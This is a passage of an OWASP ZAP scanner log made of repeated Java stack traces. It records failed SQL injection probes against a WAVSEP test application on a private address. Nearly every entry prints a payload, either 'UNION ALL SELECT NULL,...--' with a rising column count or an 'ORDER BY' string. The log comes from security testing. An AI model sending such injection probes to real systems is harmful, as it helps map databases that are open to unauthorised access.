org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679736 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679736 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679737 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679738 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679739 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679740 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679741 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679741 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679742 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679743 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679744 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 6999-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6999-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679745 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679745 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 